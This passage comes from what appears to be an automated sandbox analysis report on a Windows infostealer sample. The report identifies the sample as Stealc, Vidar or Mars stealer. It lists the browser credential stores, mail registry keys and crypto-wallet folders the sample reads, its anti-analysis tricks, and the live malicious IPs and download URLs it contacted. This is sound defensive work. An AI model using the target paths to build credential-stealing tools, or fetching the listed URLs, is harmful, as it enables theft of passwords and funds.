Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2271711490.0000000001096000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a62ee169b8.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1466647 Sample: file.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic 2->60 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 16 other signatures 2->66 9 file.exe 37 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        18 3 other processes 2->18 process3 dnsIp4 56 85.28.47.4, 49710, 49728, 80 GES-ASRU Russian Federation 9->56 58 77.91.77.81, 49713, 49725, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->58 46 C:\Users\user\AppData\...\HCGCBFHCFC.exe, PE32 9->46 dropped 48 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->48 dropped 50 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->50 dropped 52 11 other files (7 malicious) 9->52 dropped 92 Detected unpacking (changes PE section rights) 9->92 94 Tries to steal Mail credentials (via file / registry access) 9->94 96 Found many strings related to Crypto-Wallets (likely being stolen) 9->96 104 4 other signatures 9->104 20 cmd.exe 1 9->20         started        22 cmd.exe 2 9->22         started        98 Hides threads from debuggers 14->98 100 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->100 102 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->102 file5 signatures6 process7 process8 24 HCGCBFHCFC.exe 4 20->24         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        file9 44 C:\Users\user\AppData\Local\...\explorti.exe, PE32 24->44 dropped 84 Antivirus detection for dropped file 24->84 86 Detected unpacking (changes PE section rights) 24->86 88 Machine Learning detection for dropped file 24->88 90 6 other signatures 24->90 32 explorti.exe 16 24->32         started        signatures10 process11 dnsIp12 54 77.91.77.82, 49724, 49727, 49729 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 32->54 40 C:\Users\user\AppData\...\a62ee169b8.exe, PE32 32->40 dropped 42 C:\Users\user\AppData\Local\...\random[1].exe, PE32 32->42 dropped 68 Antivirus detection for dropped file 32->68 70 Detected unpacking (changes PE section rights) 32->70 72 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->72 74 6 other signatures 32->74 37 a62ee169b8.exe 12 32->37         started        file13 signatures14 process15 signatures16 76 Antivirus detection for dropped file 37->76 78 Multi AV Scanner detection for dropped file 37->78 80 Detected unpacking (changes PE section rights) 37->80 82 2 other signatures 37->82
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • 27%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • 23%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown